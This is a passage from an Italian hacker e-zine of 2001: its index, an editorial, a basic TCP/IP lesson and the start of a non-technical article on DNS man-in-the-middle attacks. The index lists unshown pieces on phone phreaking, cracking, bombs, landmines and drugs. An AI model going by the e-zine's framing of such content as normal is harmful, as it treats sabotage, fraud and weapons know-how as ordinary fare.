Copy Link
Add to Bookmark
Report

Anarchy in the System No 04

eZine's profile picture
Published in 
Anarchy in the System
 · 25 Apr 2019

  

*ATTENZIONE: Prima di proseguire leggere il documento "disclaimer.txt"*
Per motivi di tempo non ho potuto inserire il comunicato sul CSA AURO e
FREAKNET MEDIALAB di Catania... LEGGETELO TUTTI xche' e' di vitale importanza:
e' a rischio l'hackmeeting 2001!!!! Il file e' "freaknet.txt" Grazie.
[OldirOn61]

.Ï555.
.ÁÁÁÁÁ555555. ÎÎÎÎ55 .§§§§§§§§§§555.
A555' '555555 'III5' SS5555' 'SS55
Aà55 A55555 S$S555 S$S5
àAà5 àA5555 ì5555555 $S$s55.
.ààà555 ì'555555 '$$$$$$$$5555.
.àaàaàaàaà°55 ì55555 's55555
aaa555 aaaaa5 ii5555 ss5555
;;;;55 ;;;;;; ;;;555 ;;;555 ;;;555
,,,,,5 ,,,,,, .,,,,55. ',,,555 ,,,,55
'...........' .......55. '............5'

] aNarChy In tHe sYsTem [
] aNNo 2 NuM 4 [
] gEn 20o1 [


:: FINAL VERSION :: 4-02-2001 :: FINAL VERSION :: 4-02-2001 ::

_.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._
|_-_-_-_-_-_-_-_-!!!-=[ AnArChY|iN|tHe|SySteM ]=-!!!-_-_-_-_-_-_-_-_|
|.-._.-._.-._.-._.-._.-.-.-uNiVeRsAl E-ZiNe._.-._.-._.-._.-._.-._.-.|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=+
|:.......................:InDeX_oF_cOnTeNtS:.......................:|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=+
|/.\'/.\'/.\'/.\ArTiCoLo/.\'/.\'/./|\'/.\'/.\'/.\AuToRe/.\'/.\'/.\'\|
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<|
|>>>>>>>>>>>>>>>>>>>>>>>>>>> -=| iNTr0 |=- >>>>>>>>>>>>>>>>>>>>>>>>>|
|<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|>-[ EDITORIALE ]----<*>----------------->OldirOn61<--<|
|>-[ PROPOSTA DI ANTI-SOCIAL ]----<*>--------------->Anti-Social<--<|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<|
|>>>>>>>>>>>>>>>>>>>>>>>>> -=| cYbErPunX |=- >>>>>>>>>>>>>>>>>>>>>>>|
|<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^] HacKinG [^^^^^^^^^^^^^^^^^^^^^^^|
|<-[ TCP/IP CONOSCERE CAPIRE...]-->*<---------------->Maggiorana<-->|
|<-[ L'UOMO NEL MEZZO ]-->*<---------------->The Jackal<-->|
|<-[ I FIREWALL ]-->*<----------------->H4mBuck3r<-->|
|<-[ MINI TFTP TUTORIAL ]-->*<------------------->MainMan<-->|
|<-[ OCCULTARSI SU NT ]-->*<------------------->MainMan<-->|
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^] ProGraMmInG [^^^^^^^^^^^^^^^^^^^|
|<-[ VB6 TUTORIAL ]--------------->*<--------------------->ValK<-->|
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^] LiNux [^^^^^^^^^^^^^^^^^^^^^^^^^|
|<-[ IPV6: COME LO CARICAI ]->*<---------------------->ValK<-->|
|<-[ NFSD: UN ALTRO MODO PER... ]->*<-------------------->Amleto<-->|
|<-[ INSTALLARE QUAKE2... ]->*<----------------->Wrong-maN<-->|
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^] CraCkinG [^^^^^^^^^^^^^^^^^^^^^^|
|<-[ AGE OF EMPIRES 2 4 NEWBIES ]->*<------------------->Anarkya<-->|
|<-[ FLASH 5 (Allegato) ]------------->Fox<-->|*
|<-[ PSP 7 (Allegato) ]----------->Freon<-->|*
|<-[ STRUCTURED EXCEPTION HANDLING (Allegato) ]-------->Quequero<-->|*
|<-[ IDA 4.x GUIDE (Allegato) ]-------->Quequero<-->|**
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^] TricKs [^^^^^^^^^^^^^^^^^^^^^^^^|
|<-[ CAMBIAMI IL SERVER... ]------>*<---------------->Maggiorana<-->|
|<-[ PS2: THE USER BOOK ]------>*<------------------->A-s-A-x<-->|
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^] pHrEAKinG [^^^^^^^^^^^^^^^^^^^^^|
|<-[ SS7 TUTORIAL ]-->*<----------->Various Artists<-->|
|<-[ ETICA PHREAKER ]-->*<--------------------->{Che}<-->|
|<-[ DIGITO: TRUST NO ONE ]-->*<--------------->radioZer[0]<-->|
|<-[ ECCO IL TEST MODE! ]-->*<----------->Various Artists<-->|
|<-[ CABINE DIGITO: UN FILE... ]-->*<------------------->PHCV666<-->|
|<-[ PHREAKING, SEGRETERIE E...]-->*<------------------>mR_bIs0n<-->|
|<-[ ALIMENTARE UN ROTOR ]-->*<------------------>GourangA<-->|
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^] bIg BroTher InsIde [^^^^^^^^^^^^|
|<-[ AUTOMAZIONE REGISTRAZIONI TELEFONICHE ]-------------->WaVer<-->|
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^] cUlTuRe [^^^^^^^^^^^^^^^^^^^^^^^|
|<-[ FILM DA VEDERE ]----------->*<------------------>]CyBOrG[<-->|
|<-[ LIBRI DA LEGGERE ]----------->*<------------------>]CyBOrG[<-->|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<|
|>>>>>>>>>>>>>>>>>>>>>>>> -=| g00dStuFf |=- >>>>>>>>>>>>>>>>>>>>>>>>|
|<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^] ThInKinG [^^^^^^^^^^^^^^^^^^^^^|
|<-[ LA PUBBLICITA' SUBLIMINALE ]->*<------------------>Gouranga<-->|
|<-[ CHI HA PAURA DELL'HACKER...]->*<--------------------->Keper<-->|
|<-[ I PENSIERI STRANI DI... ]->*<-------------------->Tonino<-->|
|<-[ CYBLIFE: RAFFREDDATO... ]->*<------------------------->?<-->|
|^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^] aNarChy [^^^^^^^^^^^^^^^^^^^^^^|
|<-[ I VIRUS BIOLOGICI ]-->*<------------------>GourangA<-->|
|<-[ BOMBA ALL'IDROGENO ]-->*<------------------>m4l3f1k0<-->|
|<-[ MINA ANTIUOMO ]-->*<------------------>GourangA<-->|
|<-[ LISTA DELLE SOSTANZE (tr) ]-->*<------------------>m4l3f1k0<-->|
|<-[ COME FAR FUORI IL... (tr) ]-->*<------------------>m4l3f1k0<-->|
|^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^] sKamMiNg [^^^^^^^^^^^^^^^^^^^^^|
|<-[ BLOCCARE I DISPOSITIVI... ]-->*<------------------>GourangA<-->|
|<-[ SKAM MATERIALE TELEFONICO ]-->*<---------------------->PHCV<-->|
|<-[ CARTOLINE E LETTERE A L 0 ]-->*<------------------>mR_bIs0n<-->|
|<-[ SKAM'n'TRASH! UTILI... ]-->*<-------------------->HK_S_1<-->|
|^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^] nArCoS [^^^^^^^^^^^^^^^^^^^^^^^|
|<-[ BONK E NARGHILE' MOLTO...]--->*<--------------------->Ra104<-->|
|<-[ IL METODO QUEPACK ]--->*<------------------>Quequero<-->|
|^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^] aLcHooLikS[^^^^^^^^^^^^^^^^^^^^|
|<-[ DOLORI DA VINO... ]-->*<---------------->Maggiorana<-->|
|<-[ ALCOOL E COCKTAILS (PT 2) ]-->*<----------------------->SiX<-->|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<|
|>>>>>>>>>>>>>>>>>>>>>>>>>>> -=|0uTr0 |=- >>>>>>>>>>>>>>>>>>>>>>>>>>|
|<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|<-[ HOTWEB ]--------------->*<------------------>]CyBOrG[<-->|
|<-[ LOSS TIME ]--------------->*<----------------->OldirOn61<-->|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-.

* Questi tute sono stati allegati nel loro formato originale (.html)
per facilitare la lettura...

** Per quanto riguarda il tute su Ida Pro siamo stati costretti ad allegarlo,
Infatti in formato "text only" il tue avrebbe perso molto... andate un po'
a vedere perche' :)


[ Gli Allegati ]

cudilla.zip -allegato di- "Crackare Age fo Empires 2 4 Newbies"
ps2.zip -allegato di- "PS2 The User Book"
pt.zip -allegato di- "Cartoline e Lettere a Lit. 0"
quake2.zip -allegato di- "Installare quake2 su linux e..."
ss7.zip -allegato di- "SS7 tutorial (parte 1 & 2)"
tel.gif -allegato di- "Circuito di automazione per registrazioni..."

idatut12.zip -Vedi **
porte.html -Lista delle porte utilizzate dai trojan by -=energyz=-
manifesto.mp3 -Parte del manifesto di Mentor interpretato da KillMoon




.----------------------------------------------------------------------------.
| EDITORIALE by OldirOn61 |
*----------------------------------------------------------------------------*

Eccoci qua, ancora una volta sulla rete! Anche se purtroppo e' passato molto
tempo, troppo anzi, dall'ultima pubblicazione di AiS (Il 3 e' uscito a giugno
2000, il 4 esce alla fine di gennaio 2001).
E' passato molto tempo, molta gente pensa tuttora che AiS sia morta li' al
numero 3... invece no! Siamo tornati! E questa volta cercheremo di mantenere
un minimo di consegne, pur mantenendo l'aperiodicit… di questa zine.

Questa lunga latitanza e' da attribuire all'assenza per parecchio tempo del
sottoscritto e di altri "capisaldi" di AiS; non sono qui adesso per parlarvi
di quello che mi e' successo, vorrei solo far capire che il mio non e' stato
DISINTERESSE per un progetto in cui tuttora credo... semplicemente manca il
tempo materiale, mancano le disponibilita', e perche' no', anche per un fatto
monetario (Le connessioni, seppur poco COSTANO :()

AiS4 sara' una zine un po' particolare, forse non di livelli elevatissimi,
diciamo che deve essere considerato come espediente per ricominciare a
lavorare e portare AiS ai livelli (IMO) + che soddisfacenti che questa zine
aveva raggiunto.

In effetti ci sono articoli un po' vecchiotti, ma pur sempre utile per un uso
teorico... con molto piacere devo dire che questa volta, anche grazie alla
mamma telecom, ci sono un bel po' di art. sul phreaking, specialmente sulle
nuove cabine pubbliche: le DIGITO...

Questa e' la versione finale, editata il 4 feb 2001, per correggere alcuni
errori, inserire un articolo al posto di un altro (Green Phreak on A Leash2
al posto del num1, gia' pubblicato in Newbies5), ed infine eliminare un
articolo rivelatosi uno sfacciato ripping verso un altro doc di qualche anno
fa.

Ora vi lascio alla zine...buona lettura! ;)

PS: L'e-mail di ais (aisprod@freemail.it) probabilmente non esiste piu',
fino a nuove disposizioni mailate tutto a Oldiron61@aisprod.net

[ OldirOn61 ]


.----------------------------------------------------------------------------.
| UNA PROPOSTA by Anti-Social |
*----------------------------------------------------------------------------*


Ciao, sono Anti-Social,

volevo proporvi un idea, ha anche io come molti di voi gestisco un sito, che
pubblica materiale alternativo (e-zine,faq,inf..).

La nostra filosofia si basa sull’informazione libera per tutti, purtroppo
mi sono accorto che ognuno è un po’ disperso per i "cazzi" suoi, nel senso
che esistono dei piccoli gruppetti ma non esiste una vera propria
collaborazione.

Pensa che si potesse instaurare un certo contatto fra i siti, creando delle
sezioni o servizi in comune, (robe moto semplici) io pensavo a due
cose principalmente:

- una MailLista che collega tutti, dove uno si iscrive e riceve un E-mail ogni
qualvolta ci sono degli aggiornamenti di uno qualsiasi sito appartenente a
questa iniziativa.
Naturalmente deve essere seria come cosa deve essere un semplice metodo per
tenere al corrente tutti, non un forum che chiunque puo' scrivere qualsiasi
cazzata che chi passa per la testa.

- La seconda idea era di avere al sezione link "condivisa" con tutti i nostri
siti una soluzione potrebbe essere quella di creare un applet che legga il
contenuto di un file posizionato su si un server , dove risiedono i link
che noi riteniamo interessanti. Dando per scontato che solo "pochi" possano
aggiornare la lista con quello che ritengono attinente e non
www.Come_diventre_hacker_in_10_minuti.lammer.it

Queste potrebbero essere due idee, poi lascio a voi la decisione.
Se veramente avete creato un sito e scritto e-zine perche' credevate nelle
informazione libera a tutti, ditemi il vostro parere..


Scusate per il disturbo.

Anti-Social@hushmail.com
www.INSICURE.org

[ Anti-Social ]


.------------------------------------------------------------[ HacKinG ]-----.
| PROTOCOLLO TCP/IP CONOSCERLO, CAPIRE, UTILIZZARLO |
*---------------------------------[ Maggiorana ]--maggiorana@tiscalinet.it]--*

Salve a tutti, eccoci di nuovo qu.
Questo vuole essere il primo di una serie di articoli attraverso i
quali mi sono ripromesso di creare una specie di enciclppedia sul
TCP/IP. Mi è venuto in mente per due motivi 1 serve a me per
rinfrescare certi concetti sempre utili 2 potrebbe servire a qualcuno.
questa specie di corso si svolgera in lezioni con parte teorica ed
esercizi, che serviranno per mettere a frutto quanto letto.
Bene iniziamo.

-----------------------
LEGENDA PER L'UTILIZZO
-----------------------
() LE PARENTESI TONDE INDICANO ELEMENTI DI SINTASSI FACOLTATIVI PER
ESEMPIO (NOME FILE)

[] LE PARENTESI QUADRE INDICANO ELEMENTI DI SINTASSI OBBLIGATORI

+ INDICA CHE I TASTI DEVONO ESSERE PREMUTI INSIEME

- INDICA CHE I TASTI DEVONO ESSERE PREMUTI CONSECUTIVAMENTE
-------------------------------------------------
LEZIONE 1: INTRODUZIONE A TCP/IP
In questa lezione: Informazioni generali sul protocollo TCP/ip.
Breve storia del TCP/ip
Elaborazione degli standard internet
Utility di TCP/ip
-------------------------------------------------
Informazioni generali sul protocollo TCP/ip:
-------------------------------------------------
Ok ragazzi iniziamo.
Il protocollo TCP/IP ha raggiuhto ad oggi una notevole importanza,
in modo particolare per ciò che riguarda internet e il suo mondo.
Per TCP/IP si intende "Trasmission Control Protocol/Internet Protocol"
Insomma un insieme di protocolli standard progettati per le reti WAN
"non sapete che cazzo è una WAN?" una rete geografica ragazzi.
Avete presente una normale rete? bhe! la stessa cosa solo che anzichè
avere tutti i Pc nello stesso posto li si ha disposti sul territorio.
Che sò un nodo a Roma uno a palermo ed uno a Venezia. Collegati frà
loro di solitò tramite router (che cosè un router?) CAZZO SCARICATE
AIS 0 ED 1 TROVATE ARTICOLI SUI MOTORI DI RICERCA SCRIVETE ROUTER
LEGGETE E POI TORNATE QUI' "Senza sudore non si ottiene nulla".

-------------------------
Breve storia del TCP/ip
-------------------------
Un bel giorno un agenzia Americana la
DARPA "Departement of Defense Advanced Research Agency Network"
Inizia a fare esperimenti sulle reti a commutazione di pacchetto.
Stiamo parlando del periodo che và trà la fine deglia anni 60 e
l'inizio degli anni 80. Durante la sua evoluzione la storia di questo
protocollo ha avuto diversi momenti importanti vediamo quali:

1970: Gli host ARPANETE (Advanced research Agency Network)
iniziano ad utilizzare il protocollo NCP "Network control
Protocol"

1972: Viene introdotta la prima specifica Telnet RFC318 "Rfc vuol dire
Request For Comment indicano degli standard che vengono adottati
e dichiarati comuni a tutti sono reperibili digitandone il nome
seguito dal numero in qualsiasi motore di ricerca e sono sempre
ed esclusivamente in inglese"

1973: Nasce la prima RFC454 "File Trasfer Protocol"
1974: Viene spiegato nel dettaglio lo standard TCP "Trasmission
Contorl Protocol"

1981: "che cazzo hanno fatto in questo lasso di tempo?" Lo standard
IP viene pubblicato nella RFC791
1982: DCA "Defense Communication Agency" ed ARPA definiscono il
protocollo TCP "Trasmisson Control Protocol" ed
IP "Internet Protocol" come insieme di protocolli (TCP/IP)
1983: ARPANET passa da NCP a TCP/IP
1984: Introdotto il sistema DNS (domain name system) io per i nomi
interni continuo a preferire wins). ;)))

-------------------------------------
Elaborazione degli standard internet
-------------------------------------
1234567890123456789012345678901234567890123456789012345678901234567890
TCP/IP come abbiamo potuto vedere si è evoluto e ad oggi viene
utilizzato come protocollo di rete aziendale più completo ed accettato
da tutti. L'integrazione di questo protocollo ha raggiunto livelli
molto elevati, tutti i moderni sistemi operativi offrono questo
protocollo ed un numero elevatissimo di grandi reti affidano al TCP/IP
gran parte del trafico di rete. In ultimo ma non per importanza,
è anche il protocollo standard per INTERNET. Insomma avrete capito
TCP/IP è un protocollo di comunicazione. "ne conoscete di altri tipi?"
Un altro vantaggio derivato da questo protocollo è la possibilità di
connettere sistemi di vario tipo in maniera eterogenea.
Per esempio il protocollo FTP "Files trasfer protocol" o Telnet
Ora entrando nel vivo non posso fare a meno mio malgrado di basarmi
sul Microsoft TCP/IP in quanto la maggior parte dell'utenza che legge
questo articolo avrà su il SO del vecchi zio Bill (BASTARDO!!!)
Dicevamo, TCP/IP è inoltre un protocollo scalabile racchiuso in una
struttura Client/Server questo protocollo contiene l'interfaccia
Windows sockets uno strumento o meglio una API "Application program
interface"
utilizzata per le applicazioni Windows. Questa interfaccia
permette di sviluppare applicazioni Client/Server che all'occorrenza
possono utilizzare anche protocolli di rete diversi che sò NWLINK per
le reti Novell.
Arriviamo ora ad una cosa che mi fà incazzare. voi direte ma con
tutte la sigle che ci hai dato chi cazzo gestisce sto protocollo?
Un monte di bastardi!!!!!! Si definiscono un gruppo internazionale
di volontari e si fanno chiamare Internet society. Al loro interno
troviamo un mondo di sigle noiso da leggere ma utile da sapere.

ISOC: Internet society fondata nel 1992 responsabile del settore
internetworking promuove lo sviluppo di internet e dei suoi standard
protocolli inclusi.


IAB: internet architecture board è il consulente tecnico della
ISOC ed è a sua volta responsabile della IETF

IETF: internet engineering task force nel quale interno troviamo IANA
sviluppa gli standard dei protocolli e trova le soluzioni ai
problemi tecnici che si verificano sulla rete.

IANA: Internet assigned autority che a sua volta controlla IRTF
Supervisiona e coordina le assegnazioni degli identificatori
standard unici utilizzati in internet

IRTF: internet research task force
Si occupa del coordinamento dei progetti di ricerca riguardanti
il TCP/IP

Ora vediamo nel dettaglio cosa sono gli RFC: Gli RFC "Request for
comment"
sono i documenti ufficiali nei quali reperire informazioni
sul nostro protocollo. Qualsiasi membro della internet society può
richiedere l'inserimento in RFC di un documento questo viene valutato
da un esperto, sottoposto ad una commissione e poi viene approvto se
ritenuto sufficentemente diffuso o diffondibile in rete. Fatto Questo
viene classificato. Vediamo in seguito i vari tipi di classificazione.
----------------------------------------------------------------------
Required = Deve essere implementata in tutti gli host ed i gatway
basati sul tcp/ip.

Recommended = E' consigliabile implementarle nella configurazione.

Elective = E' facoltativa la sua implementazione

Limited use = Non è obbligatoria e CMQ riservata ad usi particolari.

Not recommended = Non obbligatoria anzi sconsigliata.
---------------------------------------------------------------------
Questi documenti non muoiono quì ma sono continuo oggetto di studio e
sviluppo, verifiche ed accettazione. Queste fasi vengono identificate
come livelli di maturità vediamo quali.

Proposed standard = Di solito risponde a procedure di sviluppo note
e l'argomento si considera abbastanza diffuso da
suscitare un interesse comune e quindi viene
considerato valido.

Draft standard = E' una specifica che deve essere pienamente
testata resa inconfutabile come livello di
implementazione.

Internet standard = Questo mi sembra ovvio è orami assodato che questo
è uno standard e come tale non viene messo in
discussione in quanto è chiaro che oramai la sua
diffusione ha portato un implementazione
vantaggiosa per l'intera comunità internet.
--------------------------------------------------------------------

Ad ognuno dei documenti di cui parliamo "RFC" viene assegnato un
numero, se l'argomento di cui tratta viene aggiornato non si modifica
la RFC ma ne viene redatta una nuova in sostituzione o ad integrazione
della precedente. Quindi se un argomaneto ci interessa particolarmente
dobbiamo essere certi di possedere la RFC aggiornata.
"Ricordo che le RFC sono pubbliche"
-------------------------
Utility di TCP/ip
-------------------------
Le utility TCP/IP microsoft ad esempio vengono implementate come
elementi che interagiscono col protocollo e sono rivolte alla
communicazione ed accesso verso gli host esterni.
per esempio in Win NT4.0 tutte le utility vengono considerate come
software client. In questo discorso si discosta FTP che viene
integrato come software client/server quindi opera in un discorso
bidirezionale per capirci SENG/GET ;))
Andando avanti con questo discorso troviamo anche delle utility
che permettono l'esecuzione e la connessione remota su un host
una di queste è il telnet attraverso il quale ci si può collegare ed
eseguire su un server remoto o su una macchian che abbia questo
servizio processi o comandi grazie all'emulazione terminale che
questo software offre. "MI PIACE TELNET hihihihihi"
In ultimo troviamo le utility per la stampa "LPR ed LPQ
LPR: Line print remote permette di lanciare una stampa su un host
remoto che abbia questo servizio installato mantre
LPQ: Line printer queue ci premette di ottenere lo stato di una coda
di stampa.
subito dopo arriviamo ad un punto importante del discorso le:

UTILITY DI DIAGNOSTICA

Sono disponibili molte utility per la risoluzione dei problemi TCP/IP
Mano mano che avrete la bontà di seguirmi in questo mio farneticare
impareremo ad usarle. Coraggio sò che è noioso questo articolo ma è
necessario per potersi divertire poi.
Per il momento limitiamoci ad elencarle e vedere a grandi linee a che
cazzo servono nei prossimi articoli faremo gli esercizi ed i
compitini a casa. OK!

PING = Verifica che TCP/IP sia configurato correttamente, ed inoltre
permette di controllare che il protocollo sia disponibile su un
altro host. (Per quelli di AIS che stanno ridendo, lo sò che
serve anche ad altro ma questo art è sul TCP OK!)

IPCONFIG = Controlla una configurazione TCP/IP compresi gli indirizzi
DHCP DNS WINS nonpreoccupatevi ora di sapere cosa sono
prendeteli così prossimamente vedremo a che servono ed il
loro utilizzo.

Finger = Permette di ricevere informazioni da un host remoto

NSLOOKUP = Permette l'anailisi del database DNS riguardanti un host
od un dominio.

HOSTNAME = Vi dà come ritorno il nome host del PC locale o remoto
per l'autenticazione dello stesso.

NETSTAT = controlla le statistiche sul protocollo e le connessioni
sull'host includendone lo stato

NBSTAT = Controlla lo stato del Netbios sulle connessioni TCP/IP
aggiorna la cache LMHOSTS identifica il vostro nome e lo
scope ID

Route = Visualizza e modifica la tabbella di routing locale

Tracert = Controlla il percorso seguito dal pacchetto da un host
locale all'host remoto.

ARP = Vi permette di visualizzare una cache degli indirizzi IP
risolti in locale in indirizza MAC "
Media Access control
--------------------------------------------------------------------
Per questa volta abbiamo finito, non preoccupatevi non è così
difficile come sembra sò che avrete ora molta confusione in testa e
non avrete capito un gran chè ma piano piano le cose che avrete
letto saranno più chiare. Calma e sangue freddo andando avanti tutto
risulterà chiaro. Se ne avete voglia leggetevi gli allegati. Non
soo fondamentali ma utili. Ciao alla prossiama

Per commenti ed insulti: maggiorana@tiscalinet.it
http://members.xoom.it/maggiorana


[ Maggiorana ]



.-----------------------------------------------------------[ Security ]-----.
| L'UOMO NEL MEZZO |
*--------------------------------------[ The Jackal ]--[-jackal-@libero.it]--*


° L'autore...

Stefano Mele, studente della facolta' di Giurisprudenza dell'Universita'
degli Studi di Foggia, appassionato di diritto delle Tecnologie e dei
diritti Civili in Rete, si occupa di tematiche legate alla sicurezza
informatica in ambiente Linux e Windows.


° Quanta sicurezza nelle transazioni dati attraverso il Web?

La domanda che mi viene posta piu' di frequente e' quanto sia
effettivamente sicuro compiere acquisti on-line per mezzo di carte di
credito. Il problema e' difficilmente sintetizzabile in poche righe e
richiederebbe un'analisi completa e dettagliata.
Questo articolo, quindi, lungi dal voler essere esaustivo e
particolarmente tecnico o esplicativo delle modalita' di attacco e di
difesa, intende piuttosto attirare l'attenzione su cosa e' necessario
fare per migliorare la privacy in Rete.
Tuttavia pur volendo condurre un discorso globale che affronti il
problema nelle sue linee generali, non si puo' evitare di scomporre la
trattazione in due momenti precisi... utilizzando, come elemento
separatore, l'avvento, nelle transazioni di dati, di algoritmi di
crittazione cosiddetta "forte".
Antecedentemente alla loro introduzione, infatti, i dati (anche quelli
piu' "sensibili" come, appunto, i numeri di carte di credito) viaggiavano
nelle reti locali e su Internet completamente "in chiaro" (un po' come
avviene normalmente oggi per i messaggi di posta elettronica che, piu'
che lettere elettroniche, possono essere considerate delle vere e proprie
"cartoline" elettroniche!!), consentendo ad un attacker, comunque esperto
e ben motivato, di intromettersi nel flusso di dati e di "rubare" le
informazioni piu' interessanti.
Il cosiddetto "DNS Man_in_the_middle attack" e' un classico e si basa
sullo spoofing (si puo' tradurre con il termine "contraffazione") del
Sistema di Nomi dei Domini... DNS, appunto.
Perche' il discorso possa essere compreso pienamente, ritengo non
superfluo soffermarmi a spiegare, brevemente, cosa e' il DNS e come
funziona.

Il DNS (Domain Name Server) e' un semplicissimo protocollo Internet che
si occupa di convertire il nome del sito da voi digitato nel browser
(per esempio, http://packetstorm.securify.com/index.shtml) nel suo
ambiguo indirizzo IP, al quale verra' poi spedita una richiesta di
connessione. Per intenderci, funziona esattamente come la rubrica di un
telefonino. Una volta ricercato il nome della persona da chiamare, il
telefonino rimanda automaticamente il numero associato a quel nome
(sempre che ce ne sia uno!!), permettendovi di chiamare senza bisogno
che siate voi a ricordare il numero di telefono.

Un attacker, quindi, sostituendo nelle tabelle dei DNS l'indirizzo IP
reale, per esempio, della banca della vittima, con l'indirizzo di una
macchina da lui controllata, potra' fungere da vero e proprio
"mediatore"... reinstradando (e copiando!!) tutti i dati che i due
computers si scambiano.
Come ho detto in precedenza, lo scopo di quest'articolo non sta nello
spiegare tecnicamente il "come" attuare un attacco del genere, ma, ve lo
posso assicurare, se il tutto andra' a buon fine, non ci sara' nessuna
traccia palese che la vittima non e' stata collegata soltanto con la
banca.

C'e' da dire, pero', che effettivamente il problema non e' tanto nel DNS
stesso, quanto piuttosto nei metodi e nei meccanismi di autenticazione
usati. Infatti, mantenendo l'esempio precedente, se la banca si assicura
dell'identita' dell'utente attraverso un sistema di password e PIN,
nello stesso tempo all'utente non viene data nessuna garanzia di
essere collegato realmente con quella banca.
Il discorso, naturalmente, e' a maggior ragione valido anche per un
semplice "negozio" on-line.

Questo tipo di attacco, seppure ancora largamente utilizzato nelle reti
locali poco sicure, sta diventando ormai sempre piu' raro e di difficile
applicazione per due motivi fondamentali.
Il primo e' legato esclusivamente ad Internet.
Il proliferare, negli ultimi due anni, di providers e di abbonamenti
gratuiti, dovuti all'esplosione di quello che ormai e' diventato un
vero fenomeno di massa, ha comportato la quasi impossibilita' di
predire il percorso che i pacchetti dati faranno.
Il secondo, di carattere generale, ha come oggetto, appunto,
l'utilizzazione di algoritmi di crittazione cosiddetta "forte".
La loro utilizzazione, infatti, risolve sicuramente il problema del
transito dei dati in chiaro ed, in alcuni casi specifici, anche quello
dell'autenticazione (si pensi, ad esempio, al caso della firma digitale
per i messaggi di posta elettronica).

L'estrema difficolta' attuale di intromettersi nella connessione e di
seguire il percorso dei pacchetti di dati e l'impossibilita' di
decrittare un file in tempi ragionevolmente brevi, sembrano risolvere
facilmente il problema. Infatti un algoritmo di 1024 bit e', ormai,
considerato uno standard minimo... e, soltanto pochi giorni fa, un team
di esperti svedesi, in un anno intero di lavoro ed utilizzando dei mezzi
informatici tra i piu' avanzati, e' riuscito a craccare i 512 bit,
aggiudicandosi il "Cipher Challenge"... il concorso proposto da The
Code Book di Simon Singh (per maggiori approfondimenti sull'argomento
utilizzate questo URL: http://punto-informatico.it/p.asp?i=33479).
Ma, come sempre accade nel mondo dell'informatica, la soluzione non e'
mai cosi' semplice come sembra e la risposta non e' mai soltanto una...
Le decine e decine di anni ipotizzabili anche solo per "tentare di
craccare"
un algoritmo di 1024 bit, potrebbero ridursi drasticamente se
la password del vostro "carrello elettronico" sara' costituita (come
accade nel 90% dei casi) dai vostri dati personali.
Le prime "chiavi" che saranno provate, infatti, riguarderanno sempre
possibili nomi, indirizzi e numeri di telefono vostri o di parenti ed
amici... date di nascita, sport preferiti, cantanti e tutto quello che,
in generale, potreste memorizzare (e quindi ricordare) piu' facilmente.
Tenete presente che la crittografia e' un'arte molto antica... prove
certe della sua utilizzazione si hanno gia' nel Medioevo, quando veniva
adoperata una tecnica bizantina "a trasposizione". Immaginate, quindi,
che si hanno a disposizione all'incirca sei secoli (documentati) di
esperienza su quelle che sono le tecniche di scelta e memorizzazione di
codici segreti!! Agite di conseguenza...
Evito, poi, per pudore, di prendere in considerazione il caso di alcune
